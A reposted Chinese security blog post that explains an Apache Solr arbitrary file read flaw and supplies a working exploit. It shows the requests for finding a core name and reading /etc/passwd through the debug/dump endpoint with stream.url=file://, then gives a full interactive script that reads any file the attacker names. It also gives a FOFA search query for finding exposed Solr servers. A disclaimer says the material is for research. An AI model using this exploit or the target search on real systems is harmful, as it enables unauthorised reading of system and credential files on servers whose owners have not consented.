2021.3.18发布的漏洞,也就是今天刚出来的。
非原创!原帖请点“阅读原文”
漏洞利用方式很简单,但是网上说的不是很完整。
首先我们需要访问:
/solr/admin/cores?indexInfo=false&wt=json
然后看相应数据:
{
"responseHeader":{
"status":0,
"QTime":0},
"initFailures":{},
"status":{
"ingredients":{
"name":"ingredients",
"instanceDir":"/var/solr/data/ingredients",
"dataDir":"/var/solr/data/ingredients/data/",
"config":"solrconfig.xml",
"schema":"schema.xml",
"startTime":"2021-03-18T11:41:26.398Z",
"uptime":211644}}}
差不多这个样子,ingredients就是我们需要的
构造路径:
"/solr/".ins."/debug/dump?param=ContentStreams&wt=json"
ins就是我们得到的实例对象的名称
他们说会返回xml格式的,网上的都是不带wt=json,但是我发现,dump接受这个参数,也会输出json格式,并且我们在上面获取ins的时候是可以判断服务器类型的
上面的话呢应该是:
/solr/ingredients/debug/dump?param=ContentStreams&wt=json
然后是个post数据包,路径有了,内容就是:
stream.url=file:///etc/passwd
然后也会得到一个json,这里就不带结果了
最后附上exp:
#define insqian = "name":"
#define inshou = "
#define contentqian = "stream":"
#define contenthou = "}]
function Getinstance(url){
res = HttpGetSafe(url."/solr/admin/cores?indexInfo=false&wt=json","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");
if(StrFindStr(res[0],"initFailures",0) == "-1"){
return "";
}
return GettextMiddle(res[0],insqian,inshou);
}
function GetFileContent(url,ins,FilePath){
res = HttpPostSafe(url."/solr/".ins."/debug/dump?param=ContentStreams&wt=json","stream.url=file://".FilePath,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0");
con = GettextMiddle(res[0],contentqian,contenthou);
return StrReplace(con,"\n",StrRN());
}
function main(args){
print("请输入测试的站点:");
url = input();
ins = Getinstance(url);
if(ins == ""){
print("不存在漏洞");
}else{
print("可能存在漏洞,instanceName:".ins.",请输入要查看的文件名称:");
wb = input();
while(wb != "exit"){
print(GetFileContent(url,ins,wb));
wb = input();
}
}
}
带一张效果图:
fofa搜索:
app="Apache-Solr"
本文始发于微信公众号(云剑侠心):【Cheetah语言】编写Apache-Sole最新任意文件读取漏洞EXP脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论